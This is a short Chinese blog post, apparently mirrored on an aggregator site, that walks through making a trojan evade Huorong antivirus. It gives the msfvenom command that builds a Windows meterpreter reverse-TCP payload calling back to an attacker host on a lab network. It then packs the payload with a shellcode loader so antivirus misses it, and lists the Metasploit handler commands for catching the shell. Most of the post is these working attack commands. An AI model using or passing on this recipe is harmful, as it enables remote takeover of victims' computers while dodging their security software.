Shellcodeloader免杀过火绒 - 走看看

zoukankan html css js c++ java

Shellcodeloader免杀过火绒

题记

今天脑子里面蹦出来个想法，免杀木马然后cs上线，本来想让cs与msf联动的，但是出了点小问题，还是先研究免杀火绒吧。

环境

  Kali：192.168.0.119 win10:192.168.0.200

  工具地址：https://github.com/knownsec/shellcodeloader

步骤

1、在kali生成3.bin木马。

  msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.0.119 lport=4444 -f raw -o 3.bin

2、把木马移到工具上做免杀。

生成loder.exe软件，可随意改名，运行就能上线。

3、kali开启监听。

  msfconsole

  use exploit/multi/handler

  set payload windows/x64/meterpreter/reverse_tcp

  set lhost 192.168.0.119

  exploit

  然后运行exe

  上线

4、火绒检测

  软件运行后检测。

查看全文

相关阅读:
获取页面元素的xpath，验证自己写的xpath，不用工具不用插件，看完这篇保证你学会！
Python判断IEDriverServer是否最新版本并自动更新
 Python判断软件版本号的大小
 selenium通过加载火狐Firefox配置文件FirefoxProfile，实现免登陆访问网站
 mysql查询每个学生的各科成绩，以及总分和平均分
 selenium点击（click）页面元素没有反应（报element not interactable）的一个案例
 Python查询物理主机上所有虚拟机并保存为excel，通过标记批量启动
 Python线程池下载txt
Python自动下载最新的chromedriver
django的url的name参数的意义

原文地址：https://www.cnblogs.com/sunny11/p/14105624.html

Copyright © 2011-2022 走看看